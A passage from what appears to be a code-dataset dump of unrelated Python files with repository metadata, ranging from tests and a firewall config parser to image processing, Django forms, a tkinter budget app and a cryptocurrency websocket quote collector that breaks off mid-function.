code\n","repo_name":"stfc/PSyclone","sub_path":"src/psyclone/tests/domain/nemo/transformations/enter_data_test.py","file_name":"enter_data_test.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"35"} +{"seq_id":"46063100813","text":"from semantic_release import ci_checks\n\n\ndef test_check_should_call_travis_with_correct_env_variable(mocker, monkeypatch):\n mock_travis = mocker.patch('semantic_release.ci_checks.travis')\n monkeypatch.setenv('TRAVIS', 'true')\n ci_checks.check('master')\n mock_travis.assert_called_once_with('master')\n\n\ndef test_check_should_call_semaphore_with_correct_env_variable(mocker, monkeypatch):\n mock_semaphore = mocker.patch('semantic_release.ci_checks.semaphore')\n monkeypatch.setenv('SEMAPHORE', 'true')\n ci_checks.check('master')\n mock_semaphore.assert_called_once_with('master')\n\n\ndef test_check_should_call_frigg_with_correct_env_variable(mocker, monkeypatch):\n mock_frigg = mocker.patch('semantic_release.ci_checks.frigg')\n monkeypatch.setenv('FRIGG', 'true')\n ci_checks.check('master')\n mock_frigg.assert_called_once_with('master')\n","repo_name":"atswany/TestingOnly","sub_path":"tests/ci_checks/test_checker.py","file_name":"test_checker.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18029171659","text":"\r\n# ----------------------------------------------------------------------------------------\r\nfrom .common import Plurals, Singulars, get_object\r\nfrom .route import ROUTES\r\nfrom .acl import ACLS\r\nfrom .acg import OBJS\r\n\r\n# ----------------------------------------------------------------------------------------\r\ndef _get_instances_lists_dict(config_list):\r\n\t\"\"\"creates and returns dictionary with list of configurations of sub-instances\r\n\t--> dict\r\n\t\"\"\"\r\n\t_instances_dict\t= {}\r\n\tinstance_name = None\r\n\tfor line in config_list:\r\n\t\tif line.rstrip().endswith(\" !!\") and line.startswith(\"!! START\"):\r\n\t\t\tinstance_name = \" \".join(line[3:-3].split()[1:])\r\n\t\t\t_instances_dict[instance_name] = []\r\n\t\t\t_instance_list = _instances_dict[instance_name]\r\n\t\telif instance_name and line.rstrip().endswith(\" !!\") and line.startswith(\"!! 
END\"):\r\n\t\t\tinstance_name = None\r\n\t\telif instance_name:\r\n\t\t\t_instance_list.append(line.rstrip())\r\n\treturn _instances_dict\r\n\r\n# ----------------------------------------------------------------------------------------\r\nclass INSTANCES(Plurals):\r\n\t\"\"\"firewall object with instances\"\"\"\r\n\r\n\tdef __init__(self, config_list):\r\n\t\tself._repr_dic = _get_instances_lists_dict(config_list)\r\n\t\tif not self._repr_dic:\r\n\t\t\tself._repr_dic['system'] = config_list\r\n\t\tself.set_objects()\r\n\r\n\t# ~~~~~~~~~~~~~~~~~~~ EXTERNAL CALLABLES ~~~~~~~~~~~~~~~~~~~\r\n\tdef set_objects(self):\r\n\t\t\"\"\"sets instances details\"\"\"\r\n\t\tfor _name, lines_list in self._repr_dic.items():\r\n\t\t\t_instance = INSTANCE(_name, lines_list)\r\n\t\t\t_instance.parse()\r\n\t\t\tself._repr_dic[_name] = _instance\r\n\r\n# ----------------------------------------------------------------------------------------\r\nclass INSTANCE(Singulars):\r\n\t\"\"\"a single instance object on a firewall config\"\"\"\r\n\r\n\tdef __init__(self, instance_name, instance_config_list):\r\n\t\tsuper().__init__(instance_name)\r\n\t\tself._repr_dic['conf_list'] = instance_config_list\r\n\t\t\r\n\t# ~~~~~~~~~~~~~~~~~~~ EXTERNAL CALLABLES ~~~~~~~~~~~~~~~~~~~\r\n\tdef parse(self):\r\n\t\t\"\"\"parsing through config\"\"\"\r\n\t\tconf_list = self._repr_dic['conf_list']\r\n\t\tself['routes'] = get_object(ROUTES, conf_list=conf_list)\r\n\t\tself['obj_grps'] = get_object(OBJS, conf_list=conf_list)\r\n\t\tself['acls'] = get_object(ACLS, conf_list=conf_list, objs=self['obj_grps'])\r\n\r\n# ----------------------------------------------------------------------------------------\r\n","repo_name":"aliasgar1978/fwOper","sub_path":"fwOper/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34385399236","text":"\"\"\"\n CS20B1097 HIMANSHU\n\n Download the leaning tower of the PISA image and \n find the angle of inclination using appropriate \n rotations with bilinear interpolation.\n\"\"\"\n\nimport cv2\nimport numpy as np\n\ndef image_rotation(image, angle):\n angle = np.radians(angle)\n\n height = image.shape[0]\n width = image.shape[1]\n final_image = np.uint8(np.zeros(image.shape))\n x0, y0 = (width//2), (height//2)\n\n for x in range(height):\n for y in range(width):\n x_new = (x-x0) * np.cos(angle) + (y-y0) * np.sin(angle)\n y_new = -(x-x0) * np.sin(angle) + (y-y0) * np.cos(angle)\n x_new = round(x_new) + x0\n y_new = round(y_new) + y0\n\n if (x_new >= 0 and y_new >= 0 and x_new < image.shape[0] and y_new < image.shape[1]):\n final_image[x, y, :] = image[x_new, y_new, :]\n\n # for x in range(height):\n # for y in range(width):\n # if final_image[x, y, :].all() == 0:\n # if x1 and y>1:\n # for z in range(3):\n # final_image[x, y, z] = (final_image[x+1, y, z] + final_image[x-1, y, z] + final_image[x, y+1, z] + final_image[x, y-1, z])/4\n\n return final_image\n\n\nimage = cv2.imread(\"PISA.jpg\")\ncv2.imshow(\"Original Image\", image)\n\n# angle in degree\nangle = 8\n\n# Image Rotation using user defined function\nrotated_image_userdef = image_rotation(image, angle)\ncv2.imshow(\"Rotated Image using User defined function\", rotated_image_userdef)\n\n# Image Rotation using Built-in function\nmatrix = cv2.getRotationMatrix2D((image.shape[0]/2, image.shape[1]/2), angle, 1)\nrotated_image_buitin = cv2.warpAffine(image, matrix, (image.shape[1], 
image.shape[0]))\ncv2.imshow(\"Rotated Image using Buit-in function\", rotated_image_buitin)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"malviyaHimanshu/digital-image-processing","sub_path":"Assignment 4/assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72315256101","text":"from django import forms\nfrom appointment_app.models import DoctorAppointment, OnlineDoctorAppointment\n\nclass DoctorAppointmentForm(forms.ModelForm):\n \n class Meta:\n model = DoctorAppointment\n fields=('appointment_time',)\n\n widgets={\n 'appointment_time':forms.TimeInput(attrs={'class':'timepicker','type':'time','format':'%H:%M','placeholder':'HH:MM:AM'}),\n }\n\nclass OnlineDoctorAppointmentForm(forms.ModelForm):\n \n class Meta:\n model = OnlineDoctorAppointment\n fields=('online_appointment_time',)\n\n widgets={\n 'online_appointment_time':forms.TimeInput(attrs={'class':'timepicker','type':'time','format':'%H:%M','placeholder':'HH:MM:AM'}),\n }\n","repo_name":"Smile-94/My-Doctor-Patient-Management-Systm","sub_path":"patientmanagement/appointment_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3357115300","text":"import numpy as np\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqUtils import GC\nfrom Bio import AlignIO\nfrom Bio import pairwise2\nfrom Bio.Align import MultipleSeqAlignment\nfrom Bio.SeqRecord import SeqRecord\nimport pandas as pd\nimport os,sys\n\n# file with sequences\nsequence_file = sys.argv[1]\nlineage_file = sys.argv[2]\n\ndef getDataLine(seqId, seq):\n dataLine = []\n dataLine.append(seqId)\n\n newSeq = \"\"\n newSeq = newSeq + seq\n\n dataLine.append(newSeq)\n\n return dataLine\n\n\n# altered DNA to protein (DNA to AA)\ndef translate(seq,metadata):\n metadata = pd.read_csv(metadata,encoding='ISO-8859-1')\n seqs = SeqIO.parse(seq, 'fasta')\n dataList = []\n table = {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'*', 'TAG':'*',\n 'TGC':'C', 'TGT':'C', 'TGA':'*', 'TGG':'W',\n '---': '-',}\n protein =\"\"\n for record in seqs:\n for line in range(len(record)):\n if record.id == metadata['strain'][line]:\n for i in range(0, len(record.seq), 3):\n if str(record.seq.upper())[i:i + 3] in table:\n codon = str(record.seq.upper())[i:i + 3]\n protein+= table[codon]\n else:\n codon = \"X\"\n protein+= codon\n dataList.append(getDataLine(record.id,Seq(protein)))\n break\n return dataList\n\ntran_alignment = translate(sequence_file,lineage_file)\n\n# export transform data\npd.DataFrame(tran_alignment, columns=['id','Seq']).to_csv('{}_trans_alignment.csv'.format(os.path.splitext(sequence_file)[0]), index = False,encoding='utf-8')\n\npath = 
os.path.splitext(sequence_file)[0]\nprint(f'Transforming finshed! \\n Output saved: {path}_tran_alignment.csv')","repo_name":"cychaoo/HAClade_H3N2","sub_path":"script/dna2aa.py","file_name":"dna2aa.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41092419165","text":"from dash import html, dcc\n\nimport dash_bootstrap_components as dbc\nimport dash_daq as daq\n\nfrom .colores import *\n\nfrom ..data import MUNICIPIOS\n\nFiltros = html.Div(\n [\n html.H4(\"MAPA NORMATIVO\", className=\"text-white pt-3\"),\n html.P([\n \"Seleccioná el municipio de tu interés.\",\n html.Br(),\n \"Activá y desactivá las capas de los diferentes elementos. De momento está disponible Mar Chiquita.\"\n ]),\n dbc.Row([dbc.Col([\n html.Label(htmlFor=\"select-municipio\", title='Municipio'),\n dcc.Dropdown(\n id=\"select-municipio\",\n options=MUNICIPIOS,\n multi=False,\n searchable = False,\n placeholder = 'Selecciona un municipio.',\n value=\"Mar Chiquita\",\n clearable=False,\n ) \n ], md=12), \n \n ]),\n html.Br(),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_cursos\", labelPosition=\"bottom\",color=CURSOS_CUERPOS_AGUA), md=3),\n dbc.Col(html.Span(\"Cursos de agua\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_cuerpos\", labelPosition=\"bottom\",color=CURSOS_CUERPOS_AGUA), md=3),\n dbc.Col(html.Span(\"Cuerpos de agua\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_localidades\", labelPosition=\"bottom\",color=LOCALIDADES), md=3),\n dbc.Col(html.Span(\"Localidades\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_reservas\", labelPosition=\"bottom\",color=RESERVAS), md=3),\n dbc.Col(html.Span(\"Reservas\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_escuelas\", labelPosition=\"bottom\",color=ESCUELAS), md=3),\n dbc.Col(html.Span(\"Escuelas\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_excl\", labelPosition=\"bottom\",color=ZONA_EXCLUSIÓN), md=3),\n dbc.Col(html.Span(\"Zonas de Exclusión\"), md=9)\n ], className=\"mb-2\"),\n dbc.Row([\n dbc.Col(daq.BooleanSwitch(on=True, id=\"toggle_amort\", labelPosition=\"bottom\",color=ZONA_AMORTIGUAMIENTO), md=3),\n dbc.Col(html.Span(\"Zonas de Amortiguamiento\"), md=9)\n ], className=\"mb-2\"),\n \n \n ],\n id=\"filtros\",\n className=\"mt-5\"\n)","repo_name":"reflejar/pis-dash","sub_path":"pages/mapa_normativo/componentes/filtros.py","file_name":"filtros.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72350514662","text":"import sys\nimport tkinter as tk\nfrom tkinter import ttk\nfrom datetime import date\nfrom pyrecord import *\nfrom pycategory import *\n\ncategories = Categories()\nrecords = Records()\n\ndef balance(money):\n global bala_str\n records.set_balance(int(money))\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n\ndef delete():\n global record_box\n records.delete(record_box.index(record_box.curselection()))\n record_box.delete(record_box.curselection())\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n\ndef add(date, category, description, amount):\n category = category.replace(' ', '')\n category = category.replace('-','')\n records.add(date + 
' ' + category + ' ' + description + ' ' + amount, categories)\n global record_box\n global bala_str\n record_box.delete(0, tk.END)\n for i , r in enumerate(records.records):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n\ndef find(category):\n target_categories = categories.find_subcategories(category, categories._categories)\n L = records.find(target_categories)\n global record_box\n record_box.delete(0, tk.END)\n for i , r in enumerate(L[1]):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n global bala_str\n bala_str.set(\"Total amount above is \" + str(L[0]) + \" dollars.\")\n\ndef reset():\n global record_box\n record_box.delete(0, tk.END)\n for i , r in enumerate(records.records):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n global bala_str\n bala_str.set(\"Now you have \" + str(records.balance) + \" dollars.\")\n \n\nroot = tk.Tk()\nf = tk.Frame(root)\nf.grid(row = 0, column = 0)\nroot.title('PyMoney')\n\nfind_label = tk.Label(f, text = 'Find category')\nfind_label.grid(row = 0, column = 0)\nfind_str = tk.StringVar()\nfind_entry = tk.Entry(f, textvariable = find_str)\nfind_entry.grid(row = 0, column = 1)\nfind_btn = tk.Button(f, text = 'Find', command = lambda: find(find_str.get()))\nfind_btn.grid(row = 0, column = 2)\nrst_btn = tk.Button(f, text = 'Reset', command = lambda: reset())\nrst_btn.grid(row = 0, column = 3)\n\ninit_label = tk.Label(f, text = 'Initial money')\ninit_label.grid(row = 1, column = 4)\ninit_str = tk.StringVar()\ninit_entry = tk.Entry(f, textvariable = init_str)\ninit_entry.grid(row = 1, column = 5)\ninit_entry.insert(0, 0)\nupda_btn = tk.Button(f, text = 'Update', command = lambda: balance(init_str.get()))\nupda_btn.grid(row = 2, column = 5, sticky='E')\n\nspac_label = tk.Label(f, text = '')\nspac_label.grid(row = 3, column = 4)\n\ndate_label = tk.Label(f, text = 'Date')\ndate_label.grid(row = 4, column = 4)\ndate_str = tk.StringVar()\ndate_entry = tk.Entry(f, textvariable = date_str)\ndate_entry.grid(row = 4, column = 5)\ndate_entry.insert(0, str(date.today()))\n\ncate_label = tk.Label(f, text = 'Category')\ncate_label.grid(row = 5, column = 4)\ncate_str = tk.StringVar()\ncate_combo = ttk.Combobox(f, values = ['- expense',\n ' - food',\n ' - meal',\n ' - snack', \n ' - drink',\n ' - transportation', \n ' - bus', \n ' - railway',\n '- income', \n ' - salary', \n ' - bonus'], width = 18)\ncate_combo.grid(row = 5, column = 5)\n\ndesc_label = tk.Label(f, text = 'Description')\ndesc_label.grid(row = 6, column = 4)\ndesc_str = tk.StringVar()\ndesc_entry = tk.Entry(f, textvariable = desc_str)\ndesc_entry.grid(row = 6, column = 5)\n\namou_label = tk.Label(f, text = 'Amount')\namou_label.grid(row = 7, column = 4)\namou_str = tk.StringVar()\namou_entry = tk.Entry(f, textvariable = amou_str)\namou_entry.grid(row = 7, column = 5)\nadd_btn = tk.Button(f, text = 'Add a record', command = lambda: add(date_str.get(), cate_combo.get(), desc_str.get(), amou_str.get()))\nadd_btn.grid(row = 8, column = 5, sticky='E')\n\nrecord_box = tk.Listbox(f, width = 47)\nrecord_box.grid(row = 1, column = 0, rowspan = 8, columnspan = 4)\nfor i , r in enumerate(records.records):\n record_box.insert(i, f'{r.date:<11}{r.category:<30}{r.description:<21}{r.amount}')\n\nbala_str = tk.StringVar()\nbala_str.set('Now you have ' + str(records.balance) + ' dollars.')\nbala_label = tk.Label(f, textvariable = 
bala_str)\nbala_label.grid(row = 9, column = 0, columnspan = 3, sticky='W')\ndele_btn = tk.Button(f, text = 'Delete', command = lambda: delete())\ndele_btn.grid(row = 9, column = 3)\n\nf.mainloop()\n\nrecords.save()\n \n'''while True:\n command = input('\\nWhat do you want to do (add / view / delete / view categories / find / exit)? ')\n if command == 'add':\n record = input('Add an expense or income record with category, description, and amount (separate by spaces):\\n')\n records.add(record, categories)\n elif command == 'view':\n records.view()\n elif command == 'delete':\n delete_record = input(\"Which record do you want to delete? \")\n records.delete(delete_record)\n elif command == 'view categories':\n categories.view(categories._categories, 0)\n elif command == 'find':\n category = input('Which category do you want to find? ')\n target_categories = categories.find_subcategories(category, categories._categories)\n records.find(target_categories, category)\n elif command == 'exit':\n records.save()\n break\n else:\n sys.stderr.write('Invalid command. Try again.\\n')'''\n\n\n","repo_name":"haiyin0922/programming-in-python","sub_path":"project/pymoney.py","file_name":"pymoney.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40092304059","text":"import argparse\nimport cv2\nimport os\nimport warnings\nimport glob\n\nfrom basicsr.metrics import calculate_niqe\n\nlog_save_path = 'results/table_logs_all/'\n\ndata_root = 'results/Compare'\nref_root = 'datasets/'\nref_dirs = ['DIV2K/DIV2K_valid_HR/']\ndatasets = ['DIV2K100']\nmethods = ['LDL']\n\nlogoverall_path = log_save_path + 'all_avgs/NIQE_all_avgs.txt'\n\nfor index in range(len(ref_dirs)):\n ref_dir = os.path.join(ref_root, ref_dirs[index])\n for method in methods:\n img_dir = os.path.join(data_root, method, datasets[index])\n print(img_dir)\n\n img_list = sorted(glob.glob(os.path.join(img_dir, '*')))\n\n os.makedirs(log_save_path, exist_ok=True)\n log_path = log_save_path + 'NIQE__' + method + '__' + datasets[index] + '.txt'\n\n if not os.path.exists(log_path):\n\n crop_border = 4\n\n niqe_all = []\n\n for i, img_path in enumerate(img_list):\n file_name = img_path.split('/')[-1]\n basename, ext = os.path.splitext(os.path.basename(img_path))\n img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore', category=RuntimeWarning)\n niqe_score = calculate_niqe(img, crop_border, input_order='HWC', convert_to='y')\n niqe_all.append(niqe_score.item())\n log = f'{i + 1:3d}: {file_name:25}. \\tNIQE: {niqe_score.item():.6f}.'\n with open(log_path, 'a') as f:\n f.write(log + '\\n')\n\n log = f'Average: NIQE_all: {sum(niqe_all) / len(niqe_all):.6f}'\n with open(log_path, 'a') as f:\n f.write(log + '\\n')\n log_overall = method + '__' + datasets[index] + '__' + log\n with open(logoverall_path, 'a') as f:\n f.write(log_overall + '\\n')\n print(log_overall)","repo_name":"csjliang/LDL","sub_path":"scripts/metrics/table_calculate_niqe_all.py","file_name":"table_calculate_niqe_all.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"35"} +{"seq_id":"12435924480","text":"import discord\nfrom discord import app_commands\nimport logging\nimport traceback\n\nfrom typing import Optional\n\nfrom .. 
import vesta_client, session_maker, lang\nfrom ..modals import PresentationForm\nfrom ..tables import Presentation, select, or_, Guild, Ban\n\nlogger = logging.getLogger(__name__)\nsession = session_maker()\n\n\n@app_commands.guild_only()\n@vesta_client.tree.command(description=\"Submit a presentation\")\nasync def presentation(interaction: discord.Interaction):\n logger.debug(f\"Command /presentation used\")\n\n r = select(Guild).where(Guild.id == interaction.guild_id)\n guild = session.scalar(r)\n if not guild or not guild.review_channel or not guild.projects_channel:\n return await interaction.response.send_message(\n lang.get(\"presentations_not_available\", interaction.guild), ephemeral=True)\n\n r = select(Ban).where(Ban.user_id == interaction.user.id).where(Ban.guild_id == interaction.guild.id)\n response = session.scalar(r)\n if response and response.presentation_banned:\n return await interaction.response.send_message(\n lang.get(\"presentations_banned\", interaction.guild),\n ephemeral=True)\n await interaction.response.send_modal(PresentationForm(interaction))\n\n\n@app_commands.guild_only()\n@app_commands.default_permissions(ban_members=True)\nclass PresentationManage(app_commands.Group, name=\"presentationmanage\", description=\"Presentation manager\"):\n\n async def on_error(self, interaction: discord.Interaction, error):\n logger.debug(f\"Error {error} raised\")\n if isinstance(error, app_commands.errors.MissingPermissions):\n await interaction.response.send_message(\n lang.get(\"permissions_error\", interaction.guild), ephemeral=True)\n elif isinstance(error, app_commands.errors.BotMissingPermissions):\n await interaction.response.send_message(\n lang.get(\"bot_permissions_error\", interaction.guild) + f\" {', '.join(error.missing_permissions)}\",\n ephemeral=True)\n else:\n logger.error(traceback.format_exc())\n await interaction.response.send_message(lang.get(\"unexpected_error\", interaction.guild), ephemeral=True)\n\n\npresentation_manage = PresentationManage()\n\n\n@presentation_manage.command(description=\"Show a presentation\")\n@app_commands.describe(research=\"Presentation's Id or Author's Id\")\nasync def show(interaction: discord.Interaction, research: Optional[str] = None, user: Optional[discord.Member] = None):\n logger.debug(f\"Command /presentationmanage show [research={research},user={user}] used\")\n if not (research or user):\n return await interaction.response.send_message(\n lang.get(\"minimum_one_parameter\", interaction.guild), ephemeral=True)\n if user:\n r = select(Presentation).where(Presentation.author_id == user.id)\n else:\n if not research.isdecimal() or int(research) > 2 ** 63 - 1:\n return await interaction.response.send_message(\n content=lang.get(\"invalid_number\", interaction.guild),\n ephemeral=True)\n r = select(Presentation).where(or_(Presentation.id == research, Presentation.author_id == research))\n presentations = session.scalars(r).all()\n if not len(presentations):\n return await interaction.response.send_message(\n content=lang.get(\"no_result\", interaction.guild),\n ephemeral=True,\n )\n if len(presentations) == 1:\n presentation = presentations[0]\n embed = presentation.embed('222222')\n return await interaction.response.send_message(embed=embed)\n embed = discord.Embed(\n colour=int('222222', 16),\n title=lang.get(\"user_result_title\", interaction.guild)\n )\n for presentation in presentations:\n emoji = '🕑'\n if presentation.reviewed:\n emoji = ['❌', '✅'][presentation.accepted]\n embed.add_field(name=f\"{presentation.id} : 
{emoji}\", value=presentation.title)\n return await interaction.response.send_message(embed=embed)\n\n\n@presentation_manage.command(description=\"Ban a user from submitting a presentation\")\n@app_commands.describe(user=\"The user to ban\")\nasync def ban(interaction: discord.Interaction, user: discord.Member):\n logger.debug(f\"Command /presentationmanage ban {user} used\")\n\n r = select(Ban).where(Ban.user_id == interaction.user.id).where(Ban.guild_id == interaction.guild.id)\n response = session.scalar(r)\n if not response:\n response = Ban(\n user_id=user.id,\n guild_id=interaction.guild.id\n )\n session.add(response)\n response.presentation_banned = True\n\n try:\n session.commit()\n except:\n session.rollback()\n\n logger.error(traceback.format_exc())\n return await interaction.response.send_message(lang.get(\"unexpected_error\", interaction.guild), ephemeral=True)\n\n await interaction.response.send_message(\n content=f\"{user} \" + lang.get(\"user_result_title\", interaction.guild))\n\n\n@presentation_manage.command(description=\"Unban a user from submitting a presentation\")\n@app_commands.describe(user=\"The user to unban\")\nasync def unban(interaction: discord.Interaction, user: discord.Member):\n logger.debug(f\"Command /presentationmanage unban {user} used\")\n\n r = select(Ban).where(Ban.user_id == interaction.user.id).where(Ban.guild_id == interaction.guild.id)\n response = session.scalar(r)\n if not (response and response.presentation_banned):\n return await interaction.response.send_message(\n content=f\"{user} \" + lang.get(\"presentations_not_banned\", interaction.guild))\n response.presentation_banned = False\n\n try:\n session.commit()\n except:\n session.rollback()\n\n logger.error(traceback.format_exc())\n return await interaction.response.send_message(lang.get(\"unexpected_error\", interaction.guild), ephemeral=True)\n\n await interaction.response.send_message(\n content=f\"{user} \" + lang.get(\"presentations_unban\", interaction.guild))\n\n\n@presentation_manage.command(name=\"list\", description=\"Show the banlist\")\n@app_commands.describe(page=\"The page\")\nasync def banlist(interaction: discord.Interaction, page: Optional[int] = 0):\n logger.debug(f\"Command /presentationmanage list used\")\n\n r = select(Ban).where(Ban.guild_id == interaction.guild.id)\n r = r.where(Ban.presentation_banned == True).offset(50 * page).limit(50)\n results = session.scalars(r)\n\n ban_list = \"\"\n for result in results:\n ban_list += f\"<@{result.user_id}>\\n\"\n\n banned_embed = discord.Embed(title=lang.get(\"presentations_list_title\", interaction.guild), description=ban_list)\n banned_embed.set_footer(text=lang.get(\"list_page\", interaction.guild) + f\" {page}\")\n\n await interaction.response.send_message(embed=banned_embed,\n allowed_mentions=discord.AllowedMentions().none())\n\n\nvesta_client.tree.add_command(presentation_manage)\n","repo_name":"adraug/Vesta","sub_path":"vesta/commands/presentation.py","file_name":"presentation.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"30771281503","text":"import numpy as np\nfrom sklearn import metrics\n\n\ndef cal_cm(y_true,y_pred):\n \"\"\"\n 计算混淆矩阵\n \"\"\"\n y_true=y_true.reshape(1,-1).squeeze()\n y_pred=y_pred.reshape(1,-1).squeeze()\n cm=metrics.confusion_matrix(y_true,y_pred)\n return cm\n\n\ndef intersection_over_union(confusion_matrix):\n \"\"\"\n 计算IoU。输入是一个混淆矩阵。\n \"\"\"\n intersection = 
np.diag(confusion_matrix)#交集\n union = np.sum(confusion_matrix, axis=1) + np.sum(confusion_matrix, axis=0) - np.diag(confusion_matrix)#并集\n IoU = intersection / union #交并比,即IoU\n return IoU\n\n# 一个案例\ny_pred = np.random.randint(0, 3, (32,64)).reshape(1,-1).squeeze()\ny_true = np.random.randint(0, 3, (32,64)).reshape(1,-1).squeeze()\ncm = cal_cm(y_true, y_pred)\niou = intersection_over_union(cm)\nprint(iou)\n","repo_name":"BioAI-kits/utils","sub_path":"cal_iou.py","file_name":"cal_iou.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28873150251","text":"from openerp import models, fields\n\n\nclass ResUsers(models.Model):\n _inherit = 'res.users'\n\n warehouse_ids = fields.Many2many(\n string='Warehouses',\n comodel_name='stock.warehouse',\n relation='user_warehouse_rel',\n column1='user_id',\n column2='warehouse_id',\n help='Warehouses allowed for this user.',\n )\n location_ids = fields.Many2many(\n string='Locations',\n comodel_name='stock.location',\n relation='user_location_rel',\n column1='user_id',\n column2='location_id',\n help='Locations allowed for this user.',\n )\n","repo_name":"pranav-1into2/Minsk","sub_path":"trey-addons/security_stock/models/res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"12299363542","text":"# coding=utf-8\n\nimport json\nimport redis\nimport websocket\n\nfrom dao_quote.util.convert import convert\nfrom dao_quote.settings import config_collect\n\n\ndef okex_on_message(ws, message):\n data = json.loads(message)\n table = data['arg']['channel']\n symbol = data['arg']['instId'].lower().replace('-', '_')\n if (table == 'trades'):\n type = 'trade'\n trade_list = data['data']\n for data in trade_list:\n trade_dict = {}\n trade_dict['ts'] = int(data['ts'])\n trade_dict['trade_id'] = data['tradeId']\n trade_dict['price'] = data['px']\n trade_dict['size'] = data['sz']\n trade_dict['side'] = data['side']\n send_event_dict(symbol, type, trade_dict)\n elif (table == 'tickers'):\n data = data['data'][0]\n type = 'ticker'\n tick_dict = {}\n tick_dict['ts'] = int(data['ts'])\n tick_dict['ask'] = float(data['askPx'])\n tick_dict['a_v'] = float(data['askSz'])\n tick_dict['bid'] = float(data['bidPx'])\n tick_dict['b_v'] = float(data['bidSz'])\n tick_dict['last'] = float(data['last'])\n tick_dict['open'] = float(data['open24h'])\n tick_dict['high'] = float(data['high24h'])\n tick_dict['low'] = float(data['low24h'])\n tick_dict['vol'] = float(data['vol24h'])\n tick_dict['amt'] = float(data['volCcy24h'])\n send_event_dict(symbol, type, tick_dict)\n elif (table == 'books5'):\n type = 'depth'\n data = data['data'][0]\n data['asks'].reverse()\n data['ts'] = int(data['ts'])\n send_event_dict(symbol, type, data)\n elif (table == 'books-l2-tbt'):\n type = 'depthall'\n instId = data['arg']['instId']\n data = data['data'][0]\n data['asks'].reverse()\n data['ts'] = int(data['ts'])\n send_event_dict(symbol, type, data)\n elif (table == 'candle1m'):\n type = 'kline'\n data = data['data']\n send_event_dict(symbol, type, data)\n\n\ndef send_event_dict(symbol, type, data):\n global exchange\n global pool\n\n key_name = '{}_{}_{}'.format(exchange, symbol, type)\n\n r = redis.StrictRedis(connection_pool=pool)\n event_type = type\n event_dict = {}\n event_dict['event_type'] = event_type\n event_dict['key_name'] = key_name\n event_dict['exchange'] = exchange\n 
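    # hypothetical clarifying comment: remaining payload fields are filled in below, then the event is JSON-encoded and published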
